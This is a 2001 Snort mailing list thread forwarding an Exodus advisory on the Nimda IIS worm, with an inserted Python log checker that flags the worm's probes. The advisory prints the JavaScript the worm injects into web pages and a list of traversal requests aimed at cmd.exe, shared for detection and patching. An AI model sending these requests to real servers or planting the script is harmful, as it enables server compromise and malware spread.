Snort mailing list archives

RE: Need help fast!


From: Anthony Geoffron <anthonyg () passinglane com>
Date: Tue, 18 Sep 2001 20:20:55 -0700

Here is an advisory from Exodus.

But at this time it seems there is no information
on how to remove this virus once you get compromised.

If you guys have any information, I would appreciate it.


Exodus Confidential Customer Communication

Date:  September 18, 2001
Title: Security Advisory - IIS Worm

Summary:
Exodus, as a professional courtesy to its customers, is distributing this
Security Threat Advisory.  As many of you have probably experienced, there is
a new and prolific worm propagating across the Internet.  The worm appears to
target a large number of well-known vulnerabilities in Microsoft Windows IIS 4
and IIS 5.  In addition to targeting Microsoft IIS web servers, there is the
potential that clients operating non-Microsoft sites will experience denial of
service type effects as the worm scans for additional vulnerable hosts.

Proposed Remedy:
Microsoft patches are available at:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/default.asp

The worm appears to have a number of propagation methods.  Infected hosts scan
their associated Class "B" address space for additional victims; they also
scan open network shares and may populate their served web pages with a
snippet of Java code that induces some versions of Microsoft Outlook/Outlook
Express to download hostile executable "readme.exe".  The code can also
propagate via email with the hostile payload bearing the name "readme.exe".

An initial analysis of the worm by the Exodus Cyber Attack Team and others
within the security community revealed the following details.

Victim sites initiate a tftp session with the infecting host and download
"admin.dll".  Once on the victim system, admin.dll performs a number of
actions to include elevating the permissions of both the "guest" and "iuser"
accounts to administrator and creating a trojanized version of a number of
files to include:

c:\program files\outlook express\wabmig.exe
c:\program files\outlook express\wab.exe
c:\program files\windows nt\pinball\pinball.exe
c:\winnt\system32\mspaint.exe
c:\program files\outlook express\msimn.exe
c:\program files\internet explorer\connection wizard\isignup.exe
c:\program files\internet explorer\connection wizard\inetwiz.exe
c:\winnt\system32\inetsrv\inetmgr.exe
c:\program files\internet explorer\iexplore.exe
c:\program files\internet explorer\connection wizard\icwconn2.exe
c:\program files\internet explorer\connection wizard\icwconn1.exe
c:\program files\windows nt\dialer.exe
c:\program files\netmeeting\conf.exe
c:\winnt\system32\cmmgr32.exe

The Exodus CAT Team is in the process of analyzing these trojanized files, and
additional details regarding these files will be distributed as they are
discovered.

The worm also creates a file named "readme.eml".  On at least one compromised
system, the files appeared in the following directories:

c:\Inetpub\wwwroot
c:\Program Files\Common Files\System\ado
c:\Program Files\Microsoft Script Debugger
c:\Microsoft Script Debugger\NetMeeting
c:\Winnt\Help\debug
c:\Winnt\Help\iishelp
c:\Winnt\Help\iishelp\iis
c:\Winnt\system32\inetsrv\iisadmin

A number of websites are reporting the addition of the following snippet of
code to their pages:

</body>
</html>
<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>

The readme.eml file appears to facilitate the downloading of the hostile code
by older versions of Outlook and Outlook Express.

Until additional details about this worm are known, Exodus is recommending
that any infected host be pulled off the network.

Sites operating Microsoft IIS web servers that have not yet been infected
should be patched immediately through the most recent Microsoft Security
Advisory.

All users in your enterprise should be apprised of the threat and notified of
the potential risk associated with any attachments labeled "readme.exe".

A review of the IIS logs for a targeted server may display some or all of the
following entries:

GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir


Should you have any questions, or need any assistance, please feel free to
contact our Response Center at 1-877-393-7878.

Exodus does not guarantee or warrant that the information and recommendations
set forth in this advisory will enable customers to stop the worm from
propagating or operate a completely secure or error-free Internet site.
Exodus makes no warranty or guarantee as to suitability or efficacy of any
vendor supplied software patches.

Respectfully,

Exodus Communications, Inc.
"The Infrastructure for the Digital Economy"
Exodus Confidential Customer Communications
Web: <http://www.exodus.net>
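A small log checker for the IIS entries the advisory lists, added here as an example and not part of the advisory or of this thread. It assumes the server logged the overlong UTF-8 bytes percent-encoded (%c0%af for \xc0\xaf), that IIS decoded the path twice (so %255c reaches cmd.exe as a backslash), and it runs over a constructed log excerpt rather than a real one.

```python
import re
from urllib.parse import unquote_to_bytes

# Malformed two-byte UTF-8 sequences IIS 4/5 accepted as a path separator
# (the "\xc0\xaf" / "\xc1\x1c" probes quoted in the advisory).
OVERLONG = {b"\xc0\xaf": b"/", b"\xc0/": b"/",
            b"\xc1\x9c": b"\\", b"\xc1\x1c": b"\\"}
REQUEST = re.compile(r"\b(?:GET|POST|HEAD)\s+(\S+)")  # method + URI in a log line


def normalize_uri(uri: str) -> str:
    """Undo the worm's encodings so every traversal variant reads like '../'."""
    raw = uri.encode("latin-1", "replace")
    for _ in range(2):              # IIS decoded twice: %255c -> %5c -> '\'
        raw = unquote_to_bytes(raw)
    for seq, sep in OVERLONG.items():
        raw = raw.replace(seq, sep)
    return raw.decode("latin-1").replace("\\", "/").lower()


def classify(uri: str) -> list:
    """Return why a request looks like a Nimda/Unicode probe ([] if clean)."""
    norm = normalize_uri(uri)
    reasons = []
    if re.search(r"/(cmd|root)\.exe", norm):
        reasons.append("shell-execution request")
    if "/../" in norm:
        reasons.append("directory traversal")
    if norm.count("/") > uri.replace("\\", "/").count("/"):
        reasons.append("encoded path separator")   # '/' hidden behind %xx or overlong UTF-8
    return reasons


def scan_log(text: str) -> list:
    """Collect (uri, reasons) for every suspicious request line in an IIS log."""
    hits = []
    for line in text.splitlines():
        m = REQUEST.search(line)
        reasons = classify(m.group(1)) if m else []
        if reasons:
            hits.append((m.group(1), reasons))
    return hits


# Constructed sample log (not from the advisory): date time c-ip method uri status.
SAMPLE_LOG = """\
2001-09-18 12:00:02 192.0.2.77 GET /scripts/root.exe?/c+dir 404
2001-09-18 12:00:02 192.0.2.77 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 404
2001-09-18 12:00:03 192.0.2.77 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 404
2001-09-18 12:00:03 192.0.2.77 GET /_vti_bin/..%5c../..%5c../winnt/system32/cmd.exe?/c+dir 404
2001-09-18 12:00:04 192.0.2.10 GET /images/logo%20small.gif 200
"""
```

The third reason is the useful one for tuning: a URL whose decoded form gains a path separator is almost never a legitimate request, so it flags new encoding variants the fixed patterns above would miss.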

-----Original Message-----
From: Sheahan, Paul (PCLN-NW) [mailto:Paul.Sheahan () priceline com]
Sent: Tuesday, September 18, 2001 4:10 PM
To: Snort List (E-mail)
Subject: [Snort-users] Need help fast!
Importance: High



Hello,

Once on Thursday I noticed an outgoing telnet connection attempt on port 23
from my web server out to the Internet. Two days later I noticed an outgoing
TFTP connection attempt (port 69) from the same web server out to the
Internet. I've never seen these types of connection attempts before and they
are definitely NOT a good sign. But even more strange is that Snort logs an
alert for these connection attempts, but does NOT log any traces! I have
never seen Snort do this before. Whenever there is an alert, there has
ALWAYS been a corresponding trace to refer to. But for each of these
connection attempts, I have nothing to refer to. I'm using Snort 1.8.1 b78
on Red Hat Linux 7.0.

My questions for the group are:

* Has anyone seen any unexplained telnet or tftp coming from any of their
  servers lately? Possibly from the new w32.nimda.a.mm worm?
* Also, could this problem be a bug in Snort where it isn't logging traces
  properly all of the time? It logs traces fine for all of my other alerts.


Thanks,
Paul


_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
